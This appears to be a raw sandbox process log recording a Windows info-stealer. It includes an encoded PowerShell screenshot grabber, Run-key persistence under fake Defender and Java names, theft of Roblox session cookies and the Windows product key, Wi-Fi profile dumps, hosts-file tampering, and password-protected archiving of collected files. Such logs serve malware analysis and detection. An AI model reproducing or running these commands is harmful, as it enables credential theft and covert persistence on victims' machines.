JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Users\Admin\AppData\Local\Temp\86635797.exe
C:\Users\Admin\AppData\Local\Temp\86635797.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Users\Admin\AppData\Local\Temp\Files\Identifications.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Identifications.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E990.tmp\E991.tmp\E992.bat C:\Windows\system32\java.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\Files\contorax.exe
"C:\Users\Admin\AppData\Local\Temp\Files\contorax.exe"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0ol3wjt3\0ol3wjt3.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\timeout.exe
timeout 1
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF160.tmp" "c:\Users\Admin\AppData\Local\Temp\0ol3wjt3\CSCC2F453D15D246EA8B3956CC77E54A6.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F41F.tmp\F420.tmp\F421.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FA3A.tmp\FA3B.tmp\FA3C.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5248"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5248
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31202\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\zFdMC.zip" *"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Users\Admin\AppData\Local\Temp\_MEI31202\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI31202\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\zFdMC.zip" *
C:\Users\Admin\AppData\Local\Temp\1757527941.exe
C:\Users\Admin\AppData\Local\Temp\1757527941.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\287.tmp\288.tmp\289.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A28.tmp\A29.tmp\A2A.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1236.tmp\1237.tmp\1238.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Users\Admin\AppData\Local\Temp\2063818407.exe
C:\Users\Admin\AppData\Local\Temp\2063818407.exe
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\195A.tmp\195B.tmp\195C.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
